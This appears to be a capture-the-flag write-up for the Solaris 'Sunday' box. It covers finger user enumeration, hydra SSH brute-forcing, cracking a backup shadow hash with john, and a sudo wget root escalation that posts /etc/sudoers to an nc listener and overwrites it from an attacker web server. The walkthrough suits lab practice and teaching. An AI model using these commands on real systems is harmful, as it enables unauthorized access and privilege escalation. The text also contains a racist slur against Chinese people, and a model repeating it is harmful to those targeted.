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 ·  ☕ 3 min read  ·  ✍️ M4t35Z
Name Sunday
OS Solaris
Points Easy(20)




The box runs solaris(just a unix like os)
The most interesting port is 79 we could enumerate more on this fingerd service
We have ssh on 22022 btw(thats weird af)

Fingerd(port 79)

finger @

We got nothing cuz this box is old af and rated 1.4 so no1 is doin it rn except me XD
Btw I looked at a writeup and it said the user is sunny i hope i dont get pranked by that and waste an hour of bruting with a bad username.

OOH W8 there is a 2015 script by pentestmonkey
Run it!

./ -U /usr/share/seclists/Usernames/Names/names.txt -t

We have sunny and root too.


Just brute it cuz lot of old boxes involves brute-forcing with rockyou. (They werent hammered by ~10k retards in the past like boxes nowadays that does NOT involve bruting the shit out of the box)

Now, just open a new term and use hydra to brute ssh.

hydra -V -I -l sunny -P '/usr/share/wordlists/rockyou.txt' ssh -s 22022

Daaaamn thats a long ass command! (but its working)

And we finally got it after a half hour on vip

Tha cR3d5: sunny:sunday

Now just log into ssh and enjoy the sunshin wtf am I writing now hell nah this just a solaris box that needs to be rooted and I have to do some shit homework after that cuz its 2020 March 26 and we are fkin homeschooling cuz of COVID19. Yeah some chinese bat eater fucker….

W8 dafuq is that?!

ssh -okexAlgorithms=+diffie-hellman-group1-sha1 -p 22022 sunny@

And we are finally inside! :O I mean we are on the box

Ohh u thought we have the user flag. NOPE
Just cat /etc/passwd and u will see whats the situation.
We have an other user sammy fuuuu

Privesc to sammy

Idk why but this ssh shell is so fkin laggy maybe some1 bruting the box hehexd
Just try some basic privesc vector like sudo -l or just searching for backups like /backup
We got a troll for sudo -l

But there are some hashes in /backup/shadow.backup!

Lets fire up john!

john --wordlist=/usr/share/wordlists/rockyou.txt sammy.hash

Now u just have to wait! Get a cup of tea or just wash ur hands cuz COVID19 everywhere!

Finally we got the creds

Just log in and enjoy the laggy shell n tha f14G!


Privesc to root cuz r0071n 80x35 1ncr34535 PP s1z3

Just run sudo -l again :D
We could run sudo wget wo any pw! Hell yeah!

Just check out my writeup on thm wgel ctf and u could see a 1337 wget privesc there!

Exploiting it

  1. Make an nc listener nc -lvp 1337 > sudoers
  2. Paste sudo wget --post-file=/etc/sudoers to the ssh shell
  3. Spam enters on ur nc listener
  4. <ctrl>+c ur nc
  5. Open the file!


Make sure u DELETE THE CURL JUNK from the beginning of the file otherwise say bye to the box and reset it cuz it breaks sudoers!
Just make a new line

sammy ALL=(root) NOPASSWD: /bin/bash
  1. Save it (on attacker)
  2. Host a python3 -m http.server 80 (on attacker)
  3. cd /etc (on victim)
  4. Download it with wget as sudo (on victim)
sudo wget --output-document=sudoers
  1. Run sudo -l
  2. Run sudo /bin/bash
  3. Enjoy ur rootshell!

Got root and got the root flag


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